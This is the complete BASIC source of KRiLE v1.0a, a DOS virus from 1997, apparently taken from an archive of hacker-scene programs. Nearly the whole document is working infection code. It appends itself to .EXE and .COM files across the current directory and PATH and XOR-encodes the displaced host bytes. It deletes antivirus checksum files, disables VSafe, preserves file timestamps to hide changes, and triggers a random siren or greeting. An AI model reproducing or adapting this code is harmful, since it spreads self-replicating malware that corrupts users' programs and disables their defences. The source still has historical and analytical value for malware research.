home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CASIOCOL.ZIP
/
KRILE1B.ZIP
/
SOURCE.ZIP
/
KRILE.ASI
< prev
next >
Wrap
Text File
|
1997-11-28
|
12KB
|
548 lines
rem KRiLE v1.0a written by RAiD for [SLAM]
rem This is a specialized version which does not
rem have internally encrypted text, And randomly chooses how many files
rem to infect per run, Which should result in quicker access time.
rem This version takes advantage of TinyProg v3.6 to encrypt it.
rem Use tinyprog.exe /Mb "D" krile.exe to achieve best size.
rem This version of KRiLE doesn't use arrays as large as the virus
rem size because I discovered, asic arrays are 2 bytes apiece per
rem element! and 4 bytes apiece for extended arrays. :)
rem This version of KRiLE also determines how many paths
rem are actually available, and randomly decides which of the found
rem paths are processed, as well as how many paths. :)
dim virus_data(2304)
dim host_data(2304)
call sub"Criterror!"
randomize
virus_size=4608
virus_size&=4608&
virus_sig$="1234"
exe$="*.exe"
com$="*.com"
killfil1$="anti-vir.dat"
killfil2$="chklist.ms"
killfil3$="chklist.cps"
krsig1$="■KRiLE■ v1.0a - Thought you had me eh? :-> coded by RAiD UsA [SLAM]97"
notouch$="Command|staRt|emm386|mscdex|explorer|mouse|smartdrv|setver|dos4gw"
vsafe_stats=0
gosub vsafe_toggle:
vsafe_stats=cx
call sub "exename" hostname$
yourparm$=command$
yourparm$=ltrim$(yourparm$)
yourparm$=rtrim$(yourparm$)
yourparm$=" "+yourparm$
gosub chksum_die:
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
rem Ok, we have an image loaded, let's scan the current directory
rem for use-able hosts. We also deal with any checksum files during
rem this scan.
gosub cur_dir:
rem Now, were going to find out just how many paths there are
gosub path_search:
rem We are now ready to proceed path infection, after we make one
rem safety check. (this prevents Division By zero errors)
rem Before setting, Ensure loc does *not* equal 0. If by some sad-chance
rem it does, We do *not* even attempt path infection!
target=1
range=loc
if range=0 then
virupath$=""
goto done:
endif
gosub rand_num:
total=a
rem If we made it this far, We have determined how many paths
rem There actually are. and how many we will infect. Now, let's
rem decide which ones of that total are to be infected.
exit=0
tally=-1
while exit=0
tally=tally+1
range=loc
gosub rand_num:
n=a
gosub path_infect:
if tally=total then
exit=1
endif
wend
done:
target=0
rem We're almost finished. Prepare the host for control passing.
filename$=hostname$
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
hosttemp&=hostsize&-virus_size&
move_way&=hosttemp&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
gosub close_file:
gosub strip_garbage:
newattr=oldattr
gosub set_attr:
rem Ok, siren anyone?
rem a value of 256 ensures the siren is rare, which means this
rem virus won't be detected right off the bat. No sense calling
rem attention to ourselves too soon. :)
range=256
gosub rand_num:
if a=19 then
gosub siren:
endif
call hostname$, yourparm$
r=vsafe_stats
vsafe_stats=0
gosub vsafe_toggle:
vsafe_stats=r
filename$=hostname$
rem Let's make sure we don't accidently infect the host a second
rem time. Happens rarely, but a good safety precaution anyways.
rem Besides, doesn't eat much more code space.
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
rem Check the current directory again, Host might have created
rem some new targets. pkunzip.exe being a good example. Note: This
rem allows my virus to resemble TSR based viruses somewhat. <G>
gosub cur_dir:
gosub vsafe_toggle:
rem The range was already set at 256, we'll leave it
rem as it is. and get us a number :)
range=256
gosub rand_num:
if a=19 then
gosub say_hi:
endif
rem The end has been reached, return to operating system or calling
rem program.
end
start_virus:
errcode=0
attr=6
kewl=0
rem Setup rand-generator range to 4, and decide how many files
rem were going to infect for this run :)
range=4
gosub rand_num:
virii=a
rem Ok, decision made, let's infect!
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
return
Lets_infect:
rem Lets put our virus into the file shall we? :)
hostsize&=filelen(filename$)
gosub get_attr:
oldattr=newattr
newattr=0
gosub set_attr:
gosub open_file:
gosub get_fdt:
bytesize=virus_size
dx=varptr(host_data(0))
gosub read_file:
move_way&=0&
gosub move_file_pointer:
bytesize=virus_size
dx=varptr(virus_data(0))
gosub write_file:
move_way&=hostsize&
gosub move_file_pointer:
gosub cypher_host:
dx=varptr(host_data(0))
bytesize=virus_size
gosub write_file:
gosub set_fdt:
kewl=kewl+1
gosub close_file:
newattr=oldattr
gosub set_attr:
return
rem miscallenous file i/o routines beyond this point. Boring to look
rem at.:)
get_attr:
AX = &HEX4300
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
set_attr:
AX = &HEX4301
DX = VARPTR(Filename$)
CX = NewAttr
INT86(&HEX21,AX,NA,CX,DX,NA,NA,NA,NA,NA)
return
vsafe_toggle:
ax=&hexfa02
dx=&hex5945
bx=vsafe_stats
int86(&hex16,ax,bx,cx,dx,na,na,na,na,na)
return
get_fdt:
if file_handle>4 then
AX=&HEX5700
BX=FILE_HANDLE
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
NEWDATE=CX
NEWTIME=DX
endif
RETURN
set_fdt:
if file_handle>4 then
AX=&HEX5701
BX=FILE_HANDLE
CX=NEWDATE
DX=NEWTIME
INT86(&HEX21,AX,BX,CX,DX,NA,NA,NA,NA,NA)
endif
RETURN
rem DOS int file i/o driven code beyond this point :)
rem ax=&hex3d00
rem ax opens file for read in this mode :-)
rem ax=&hex3d01
rem ax opens file for write in this mode :-)
rem ax=&hex3d02
rem ax opens file for read/write access :) hehehe
open_file:
AX=&HEX3D02
DX = VARPTR(Filename$)
INT86(&HEX21,AX,NA,na,DX,NA,NA,NA,NA,NA)
file_handle=ax
return
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad! :)
rem cx register is how many bytes to read :)
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
close_file:
rem This routine will close the selected file.
rem do not try to close handle 2, very nasty... :-(
if file_handle>4 then
ax=&hex3e00
bx=file_handle
int86(&hex21,ax,bx,na,na,na,na,na,na,na)
endif
return
move_file_pointer:
rem Moves file pointer from start of file to whereever I wanna go
rem Routine called is patched(hacked) from asilib.lib
method=0
call sub "fseek" file_handle, move_way&, method, errcode
return
cypher_host:
y=varptr(host_data(0))
z=y+virus_size
for x=y to z
a=peek(x)
ax=a
bx=x
rem Shrug, asic has no built in XOR routine, so we
rem chat with the CPU ourselves to XOR it :)
SETREGS (AX,BX,NA,NA,NA,NA,NA,NA,NA)
CODE &HEX31, &HEXD8
GETREGS (AX,NA,NA,NA,NA,NA,NA,NA,NA)
rem ENd of cpu-xor chat
poke x,ax
next x
return
infect_check:
rem routine checks for files to avoid, size validation and to make
rem sure the file is not already infected. If any of the routines
rem return infected=1 then the rest of the file i/o does not
rem occur (saves a few miliseconds i/o time)
infected=0
gosub do_not_touch:
if infected=0 then
gosub size_check:
endif
if infected=0 then
gosub prev_check:
endif
return
prev_check:
rem Is this file already infected?
gosub get_attr:
newattr=oldattr
newattr=0
gosub set_attr:
sig$=" "
gosub open_file:
move_way&=28
gosub move_file_pointer:
dx=varptr(sig$)
bytesize=4
gosub read_file:
gosub close_file:
newattr=oldattr
gosub set_attr:
if sig$=virus_sig$ then
infected=1
endif
if file_handle<5 then
rem We couldn't open the damn file to check, assume it is indeed
rem infected. and let's not fool with it. :)
infected=1
endif
return
strip_garbage:
rem This routine quickly scrapes off the appended data
rem we wrote during the infection process
gosub open_file:
move_way&=hosttemp&
gosub move_file_pointer:
dx=0
bytesize=0
gosub write_file:
gosub set_fdt:
gosub close_file:
return
do_not_touch:
rem Make sure the following files are NOT infected or
rem otherwise tampered with.
test$=filename$
test$=ucase$(test$)
test=len(test$)
test=test-4
test$=left$(test$,test)
a$=ucase$(notouch$)
b=instr(a$,test$)
if b>0 then
infected=1
endif
return
size_check:
rem make sure the target file is larger then our virus
rem if it's not, we must not bother to infect it.
a&=filelen(filename$)
if a&<virus_size& then
rem file is too small
infected=1
endif
return
chksum_die:
rem this kills chksum type files with a few simple calls
rem setting toast to killfil1$ 2 and 3 respectively
rem also cuts down on virus size.
ar$=filename$
rem above code stores original filename
toast$=killfil1$
gosub waste:
toast$=killfil2$
gosub waste:
toast$=killfil3$
gosub waste:
filename$=ar$
return
say_hi:
rem say our greeting and return to calling routine.
print krsig1$
RETURN
siren:
rem muahahaha, Siren sounds :-)
siren=1
gosub siren_out:
siren=0
gosub siren_out:
siren=1
gosub siren_out:
siren=0
gosub siren_out:
return
siren_out:
rem if were to go up, set siren=1 else
rem set siren=0 to go down :)
for x=1 to 2000
if siren=1 then
z=x
else
z=2000
z=z-x
endif
sound z,1
next x
return
cur_dir:
rem routine searches for and infects files in current directory
rem this routine is used 2 times, so I just decided to make it a
rem subroutine to save bytes.
virupath$=""
gosub chksum_die:
proc$=exe$
gosub start_virus:
proc$=com$
gosub start_virus:
return
waste:
rem routine called by chksum_die
rem removes all attributes and deletes requested file.
filename$=virupath$
filename$=filename$+toast$
newattr=0
gosub set_attr:
kill filename$
return
rand_num:
rem gets us a random number, of the selected range
rem settable with the 'range' value. Saves bytes by only
rem coding this part once and calling it on occasion for various
rem fun things. Muahahaha
a=rnd(0)
a=a mod range
if target=0 then
a=a+1
endif
return
path_search:
rem This routine tallys total paths defined
rem for later random processing.
exit=0
loc=0
while exit=0
call sub "path",loc,virupath$
if virupath$="" then
exit=1
else
loc=loc+1
endif
wend
return
path_infect:
rem routine proceeds to infect selected path given via the 'n' variable
rem Notice, another safety check. This routine will abort if the
rem selected path does not exist.
call sub "path", n, virupath$
i=LEN(virupath$)
if i>0 then
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
rem Before we infect, trash checksum files
gosub chksum_die:
proc$=virupath$+exe$
gosub start_virus:
proc$=virupath$+com$
gosub start_virus:
endif
return